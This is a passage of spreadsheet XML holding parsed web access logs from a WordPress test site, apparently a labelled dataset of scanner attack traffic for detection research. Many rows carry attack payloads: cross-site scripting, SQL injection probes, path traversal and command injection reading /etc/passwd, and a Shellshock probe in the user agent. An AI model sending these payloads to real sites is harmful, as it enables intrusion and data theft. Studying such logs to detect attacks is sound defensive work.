          <t>srbh-152254ea18b39ee4</t>
        </is>
      </c>
      <c r="C53" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%2527%2522%253Cscript%253Ealert%25281%2529%253B%253C%252Fscript%253E/my-account/edit-profile/%7B%7B%20data.image.src HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/edit-profile/%7B%7B%20data.image.src%20%7D%7D" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D53" s="2" t="inlineStr">
        <is>
          <t>/blog/'"&lt;script&gt;alert(1);&lt;/script&gt;/my-account/edit-profile/{{ data.image.src</t>
        </is>
      </c>
      <c r="E53" s="2" t="inlineStr"/>
      <c r="F53" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G53" s="3" t="inlineStr"/>
      <c r="H53" s="3" t="inlineStr"/>
    </row>
    <row r="54">
      <c r="A54" s="2" t="n">
        <v>53</v>
      </c>
      <c r="B54" s="2" t="inlineStr">
        <is>
          <t>srbh-f05ec15197679542</t>
        </is>
      </c>
      <c r="C54" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-admin/load-styles.php?c=0%22%26cat+%2Fetc%2Fpasswd%26%22&amp;dir=ltr&amp;load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&amp;ver=4.9.5 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D54" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-admin/load-styles.php</t>
        </is>
      </c>
      <c r="E54" s="2" t="inlineStr">
        <is>
          <t>c=0"&amp;cat /etc/passwd&amp;"&amp;dir=ltr&amp;load[]=dashicons,buttons,forms,l10n,login&amp;ver=4.9.5</t>
        </is>
      </c>
      <c r="F54" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G54" s="3" t="inlineStr"/>
      <c r="H54" s="3" t="inlineStr"/>
    </row>
    <row r="55">
      <c r="A55" s="2" t="n">
        <v>54</v>
      </c>
      <c r="B55" s="2" t="inlineStr">
        <is>
          <t>srbh-c7b1f1f1806172c7</t>
        </is>
      </c>
      <c r="C55" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/category%27+OR+%271%27%3D%271%27+--+/uncategorized HTTP/1.1" 404 53918 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D55" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/category'+or+'1'='1'+--+/uncategorized</t>
        </is>
      </c>
      <c r="E55" s="2" t="inlineStr"/>
      <c r="F55" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G55" s="3" t="inlineStr"/>
      <c r="H55" s="3" t="inlineStr"/>
    </row>
    <row r="56">
      <c r="A56" s="2" t="n">
        <v>55</v>
      </c>
      <c r="B56" s="2" t="inlineStr">
        <is>
          <t>srbh-2f8ead174fedeef9</t>
        </is>
      </c>
      <c r="C56" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/aliquam-odio-a-labore-magnam-quam-quis%25 HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/aliquam-odio-a-labore-magnam-quam-quis/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D56" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/aliquam-odio-a-labore-magnam-quam-quis%</t>
        </is>
      </c>
      <c r="E56" s="2" t="inlineStr"/>
      <c r="F56" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G56" s="3" t="inlineStr"/>
      <c r="H56" s="3" t="inlineStr"/>
    </row>
    <row r="57">
      <c r="A57" s="2" t="n">
        <v>56</v>
      </c>
      <c r="B57" s="2" t="inlineStr">
        <is>
          <t>srbh-f60769f8678a6831</t>
        </is>
      </c>
      <c r="C57" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/tag/nihil-alias-ab/feed/ HTTP/1.1" 200 2718 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"</t>
        </is>
      </c>
      <c r="D57" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/tag/nihil-alias-ab/feed/</t>
        </is>
      </c>
      <c r="E57" s="2" t="inlineStr"/>
      <c r="F57" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/&lt;*&gt; Firefox/27.0</t>
        </is>
      </c>
      <c r="G57" s="3" t="inlineStr"/>
      <c r="H57" s="3" t="inlineStr"/>
    </row>
    <row r="58">
      <c r="A58" s="2" t="n">
        <v>57</v>
      </c>
      <c r="B58" s="2" t="inlineStr">
        <is>
          <t>srbh-8d66808f29abbae9</t>
        </is>
      </c>
      <c r="C58" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3 HTTP/1.1" 200 10330 "http://test-site.com/" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D58" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/themes/twentyseventeen/assets/js/html5.js</t>
        </is>
      </c>
      <c r="E58" s="2" t="inlineStr">
        <is>
          <t>ver=3.7.3</t>
        </is>
      </c>
      <c r="F58" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G58" s="3" t="inlineStr"/>
      <c r="H58" s="3" t="inlineStr"/>
    </row>
    <row r="59">
      <c r="A59" s="2" t="n">
        <v>58</v>
      </c>
      <c r="B59" s="2" t="inlineStr">
        <is>
          <t>srbh-10f9d80693fafed3</t>
        </is>
      </c>
      <c r="C59" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%2527%2522%253Cscript%253Ealert%25281%2529%253B%253C%252Fscript%253E/my-account/edit-profile/%7B%7B%20data.icon HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/edit-profile/%7B%7B%20data.icon%20%7D%7D" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D59" s="2" t="inlineStr">
        <is>
          <t>/blog/'"&lt;script&gt;alert(1);&lt;/script&gt;/my-account/edit-profile/{{ data.icon</t>
        </is>
      </c>
      <c r="E59" s="2" t="inlineStr"/>
      <c r="F59" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G59" s="3" t="inlineStr"/>
      <c r="H59" s="3" t="inlineStr"/>
    </row>
    <row r="60">
      <c r="A60" s="2" t="n">
        <v>59</v>
      </c>
      <c r="B60" s="2" t="inlineStr">
        <is>
          <t>srbh-b90bd4ea89d4b716</t>
        </is>
      </c>
      <c r="C60" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/wp-json/oembed/%29/embed?format=xml&amp;url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F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      </is>
      </c>
      <c r="D60" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/wp-json/oembed/)/embed</t>
        </is>
      </c>
      <c r="E60" s="2" t="inlineStr">
        <is>
          <t>format=xml&amp;url=http://test-site.com/blog/index.php/vitae-dolores-quidem-possimus-aut-voluptatibus/</t>
        </is>
      </c>
      <c r="F60" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G60" s="3" t="inlineStr"/>
      <c r="H60" s="3" t="inlineStr"/>
    </row>
    <row r="61">
      <c r="A61" s="2" t="n">
        <v>60</v>
      </c>
      <c r="B61" s="2" t="inlineStr">
        <is>
          <t>srbh-adb08421bbbbd8ef</t>
        </is>
      </c>
      <c r="C61" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020/04/1e29rdr9tfhx9whsfdtjg25pleoorsoxxj8zd4kfqdz8dt7ugjrt99rfod HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D61" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/1e29rdr9tfhx9whsfdtjg25pleoorsoxxj8zd4kfqdz8dt7ugjrt99rfod</t>
        </is>
      </c>
      <c r="E61" s="2" t="inlineStr"/>
      <c r="F61" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G61" s="3" t="inlineStr"/>
      <c r="H61" s="3" t="inlineStr"/>
    </row>
    <row r="62">
      <c r="A62" s="2" t="n">
        <v>61</v>
      </c>
      <c r="B62" s="2" t="inlineStr">
        <is>
          <t>srbh-4d71372cf78119a3</t>
        </is>
      </c>
      <c r="C62" s="2" t="inlineStr">
        <is>
      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      </is>
      </c>
      <c r="D62" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/tag/hic-enim-consequatur-minima-quibusdam-magnam</t>
        </is>
      </c>
      <c r="E62" s="2" t="inlineStr"/>
      <c r="F62" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) version/4.0 Mobile/7A341 Safari/528.16</t>
        </is>
      </c>
      <c r="G62" s="3" t="inlineStr"/>
      <c r="H62" s="3" t="inlineStr"/>
    </row>
    <row r="63">
      <c r="A63" s="2" t="n">
        <v>62</v>
      </c>
      <c r="B63" s="2" t="inlineStr">
        <is>
          <t>srbh-223c540c9820c980</t>
        </is>
      </c>
      <c r="C63" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes HTTP/1.1" 301 327 "https://test-site.com/blog/index.php/my-account/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"</t>
        </is>
      </c>
      <c r="D63" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes</t>
        </is>
      </c>
      <c r="E63" s="2" t="inlineStr"/>
      <c r="F63" s="2" t="inlineStr">
        <is>
          <t>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)</t>
        </is>
      </c>
      <c r="G63" s="3" t="inlineStr"/>
      <c r="H63" s="3" t="inlineStr"/>
    </row>
    <row r="64">
      <c r="A64" s="2" t="n">
        <v>63</v>
      </c>
      <c r="B64" s="2" t="inlineStr">
        <is>
          <t>srbh-e1528622101aaa4f</t>
        </is>
      </c>
      <c r="C64" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/plugins/user-registration/assets/css/user-registration.css?ver=1.8.2.1 HTTP/1.1" 200 28481 "http://test-site.com/" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D64" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/plugins/user-registration/assets/css/user-registration.css</t>
        </is>
      </c>
      <c r="E64" s="2" t="inlineStr">
        <is>
          <t>ver=1.8.2.1</t>
        </is>
      </c>
      <c r="F64" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G64" s="3" t="inlineStr"/>
      <c r="H64" s="3" t="inlineStr"/>
    </row>
    <row r="65">
      <c r="A65" s="2" t="n">
        <v>64</v>
      </c>
      <c r="B65" s="2" t="inlineStr">
        <is>
          <t>srbh-27b28b1fe9b7343a</t>
        </is>
      </c>
      <c r="C65" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/03/27/qui-ratione-maxime-dolores-consequatur%22+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/2020/03/27/qui-ratione-maxime-dolores-consequatur/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D65" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03/27/qui-ratione-maxime-dolores-consequatur"+union+all+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#</t>
        </is>
      </c>
      <c r="E65" s="2" t="inlineStr"/>
      <c r="F65" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G65" s="3" t="inlineStr"/>
      <c r="H65" s="3" t="inlineStr"/>
    </row>
    <row r="66">
      <c r="A66" s="2" t="n">
        <v>65</v>
      </c>
      <c r="B66" s="2" t="inlineStr">
        <is>
          <t>srbh-aa6f521ddcd8548c</t>
        </is>
      </c>
      <c r="C66" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1 HTTP/1.1" 200 156559 "-" "() { :;}; echo 'X-Powered-By: ShellShock-Vulnerable'"</t>
        </is>
      </c>
      <c r="D66" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js</t>
        </is>
      </c>
      <c r="E66" s="2" t="inlineStr">
        <is>
          <t>ver=4.2.6-78496d1</t>
        </is>
      </c>
      <c r="F66" s="2" t="inlineStr">
        <is>
          <t>() { :;}; echo 'X-Powered-by: ShellShock-Vulnerable'</t>
        </is>
      </c>
      <c r="G66" s="3" t="inlineStr"/>
      <c r="H66" s="3" t="inlineStr"/>
    </row>
    <row r="67">
      <c r="A67" s="2" t="n">
        <v>66</v>
      </c>
      <c r="B67" s="2" t="inlineStr">
        <is>
          <t>srbh-0cb5424b4e0e0c2f</t>
        </is>
      </c>
      <c r="C67" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/themes/twentyseventeen/assets/js/global.js.log HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D67" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/themes/twentyseventeen/assets/js/global.js.log</t>
        </is>
      </c>
      <c r="E67" s="2" t="inlineStr"/>
      <c r="F67" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G67" s="3" t="inlineStr"/>
      <c r="H67" s="3" t="inlineStr"/>
    </row>
    <row r="68">
      <c r="A68" s="2" t="n">
        <v>67</v>
      </c>
      <c r="B68" s="2" t="inlineStr">
        <is>
          <t>srbh-5f6f2b6d7b87dbcc</t>
        </is>
      </c>
      <c r="C68" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog%22+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-/index.php/2020/03/27/qui-ratione-maxime-dolores-consequatur/feed HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D68" s="2" t="inlineStr">
        <is>
          <t>/blog"+union+all+select+null,null,null,null,null,null,null,null,null--+-/index.php/2020/03/27/qui-ratione-maxime-dolores-consequatur/feed</t>
        </is>
      </c>
      <c r="E68" s="2" t="inlineStr"/>
      <c r="F68" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G68" s="3" t="inlineStr"/>
      <c r="H68" s="3" t="inlineStr"/>
    </row>
    <row r="69">
      <c r="A69" s="2" t="n">
        <v>68</v>
      </c>
      <c r="B69" s="2" t="inlineStr">
        <is>
          <t>srbh-5634e53daf68cb58</t>
        </is>
      </c>
      <c r="C69" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DOWASP%2520solution/2020/04/c357e14e-0af5-317e-a4f7-bc609b90087b.jpg HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/qui-enim-sunt-minima-sit/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D69" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/http://www.google.com/search?q=OWASP solution/2020/04/&lt;*&gt;.jpg</t>
        </is>
      </c>
      <c r="E69" s="2" t="inlineStr"/>
      <c r="F69" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G69" s="3" t="inlineStr"/>
      <c r="H69" s="3" t="inlineStr"/>
    </row>
    <row r="70">
      <c r="A70" s="2" t="n">
        <v>69</v>
      </c>
      <c r="B70" s="2" t="inlineStr">
        <is>
          <t>srbh-10774040612815e0</t>
        </is>
      </c>
      <c r="C70" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-login.php?action=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 3220 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D70" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-login.php</t>
        </is>
      </c>
      <c r="E70" s="2" t="inlineStr">
        <is>
          <t>action='"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="F70" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G70" s="3" t="inlineStr"/>
      <c r="H70" s="3" t="inlineStr"/>
    </row>
    <row r="71">
      <c r="A71" s="2" t="n">
        <v>70</v>
      </c>
      <c r="B71" s="2" t="inlineStr">
        <is>
          <t>srbh-675a27bbaca02e56</t>
        </is>
      </c>
      <c r="C71" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020%27+UNION+ALL+SELECT+NULL%2CNULL%23/03/27/qui-ratione-maxime-dolores-consequatur HTTP/1.1" 404 53918 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D71" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020'+union+all+select+null,null#/03/27/qui-ratione-maxime-dolores-consequatur</t>
        </is>
      </c>
      <c r="E71" s="2" t="inlineStr"/>
      <c r="F71" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G71" s="3" t="inlineStr"/>
      <c r="H71" s="3" t="inlineStr"/>
    </row>
    <row r="72">
      <c r="A72" s="2" t="n">
        <v>71</v>
      </c>
      <c r="B72" s="2" t="inlineStr">
        <is>
          <t>srbh-1cbb5a92763f8d26</t>
        </is>
      </c>
      <c r="C72" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/themes/twentyseventeen/assets/js/navigation.js?ver=1.0 HTTP/1.1" 200 3754 "http://test-site.com/" "/../../../../../../../../../../../../../../../../"</t>
        </is>
      </c>
      <c r="D72" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/themes/twentyseventeen/assets/js/navigation.js</t>
        </is>
      </c>
      <c r="E72" s="2" t="inlineStr">
        <is>
          <t>ver=1.0</t>
        </is>
      </c>
      <c r="F72" s="2" t="inlineStr">
        <is>
          <t>/../../../../../../../../../../../../../../../../</t>
        </is>
      </c>
      <c r="G72" s="3" t="inlineStr"/>
      <c r="H72" s="3" t="inlineStr"/>
    </row>
    <row r="73">
      <c r="A73" s="2" t="n">
        <v>72</v>
      </c>
      <c r="B73" s="2" t="inlineStr">
        <is>
          <t>srbh-718f9dec2eaa938e</t>
        </is>
      </c>
      <c r="C73" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog%27+AND+%271%27%3D%271%27+--+/wp-content/uploads/2020/04/4b6aa405-8ac7-33d8-9366-43fcef53f97a-300x239.png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73" s="2" t="inlineStr">
        <is>
          <t>/blog'+and+'1'='1'+--+/wp-content/uploads/2020/04/&lt;*&gt;-300x239.png</t>
        </is>
      </c>
      <c r="E73" s="2" t="inlineStr"/>
      <c r="F73" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G73" s="3" t="inlineStr"/>
      <c r="H73" s="3" t="inlineStr"/>
    </row>
    <row r="74">
      <c r="A74" s="2" t="n">
        <v>73</v>
      </c>
      <c r="B74" s="2" t="inlineStr">
        <is>
          <t>srbh-4345af2f38a1bc88</t>
        </is>
      </c>
      <c r="C74" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/03+AND+3273%3D3273--+-/23 HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/page/2/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D74" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03+and+3273=3273--+-/23</t>
        </is>
      </c>
      <c r="E74" s="2" t="inlineStr"/>
      <c r="F74" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G74" s="3" t="inlineStr"/>
      <c r="H74" s="3" t="inlineStr"/>
    </row>
    <row r="75">
      <c r="A75" s="2" t="n">
        <v>74</v>
      </c>
      <c r="B75" s="2" t="inlineStr">
        <is>
          <t>srbh-591bad57a456fbf2</t>
        </is>
      </c>
      <c r="C75" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog%22+RLIKE+%28SELECT+%28CASE+WHEN+%289432%3D4805%29+THEN+0x626c6f67+ELSE+0x28+END%29%29+AND+%22vCps%22%3D%22vCps/index.php/2020/03 HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/page/2/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D75" s="2" t="inlineStr">
        <is>
          <t>/blog"+rlike+(select+(case+when+(9432=4805)+then+0x626c6f67+else+0x28+end))+and+"vCps"="vCps/index.php/2020/03</t>
        </is>
      </c>
      <c r="E75" s="2" t="inlineStr"/>
      <c r="F75" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G75" s="3" t="inlineStr"/>
      <c r="H75" s="3" t="inlineStr"/>
    </row>
    <row r="76">
      <c r="A76" s="2" t="n">
        <v>75</v>
      </c>
      <c r="B76" s="2" t="inlineStr">
        <is>
          <t>srbh-754620fffd92e9dd</t>
        </is>
      </c>
      <c r="C76" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/04/04/explicabo-qui-fuga-distinctio-dolores-voluptatibus-sit/.svn/entries HTTP/1.1" 404 53918 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D76" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/04/04/explicabo-qui-fuga-distinctio-dolores-voluptatibus-sit/.svn/entries</t>
        </is>
      </c>
      <c r="E76" s="2" t="inlineStr"/>
      <c r="F76" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G76" s="3" t="inlineStr"/>
      <c r="H76" s="3" t="inlineStr"/>
    </row>
    <row r="77">
      <c r="A77" s="2" t="n">
        <v>76</v>
      </c>
      <c r="B77" s="2" t="inlineStr">
        <is>
          <t>srbh-e56ce33617cead40</t>
        </is>
      </c>
      <c r="C77" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/category/uncategorized/page/2/ HTTP/1.1" 200 23053 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36"</t>
        </is>
      </c>
      <c r="D77" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/category/uncategorized/page/2/</t>
        </is>
      </c>
      <c r="E77" s="2" t="inlineStr"/>
      <c r="F77" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36</t>
        </is>
      </c>
      <c r="G77" s="3" t="inlineStr"/>
      <c r="H77" s="3" t="inlineStr"/>
    </row>
    <row r="78">
      <c r="A78" s="2" t="n">
        <v>77</v>
      </c>
      <c r="B78" s="2" t="inlineStr">
        <is>
          <t>srbh-06aba4141bde1859</t>
        </is>
      </c>
      <c r="C78" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver= HTTP/1.1" 200 156559 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D78" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js</t>
        </is>
      </c>
      <c r="E78" s="2" t="inlineStr">
        <is>
          <t>ver=</t>
        </is>
      </c>
      <c r="F78" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G78" s="3" t="inlineStr"/>
      <c r="H78" s="3" t="inlineStr"/>
    </row>
    <row r="79">
      <c r="A79" s="2" t="n">
        <v>78</v>
      </c>
      <c r="B79" s="2" t="inlineStr">
        <is>
          <t>srbh-9e80b385afb3dce1</t>
        </is>
      </c>
      <c r="C79" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/04/04/voluptas-alias-ut-iure-dicta-aliquid-corrupti HTTP/1.1" 404 276 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D79" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/../../../../../../../../../../../../../../../../etc/passwd/04/04/voluptas-alias-ut-iure-dicta-aliquid-corrupti</t>
        </is>
      </c>
      <c r="E79" s="2" t="inlineStr"/>
      <c r="F79" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
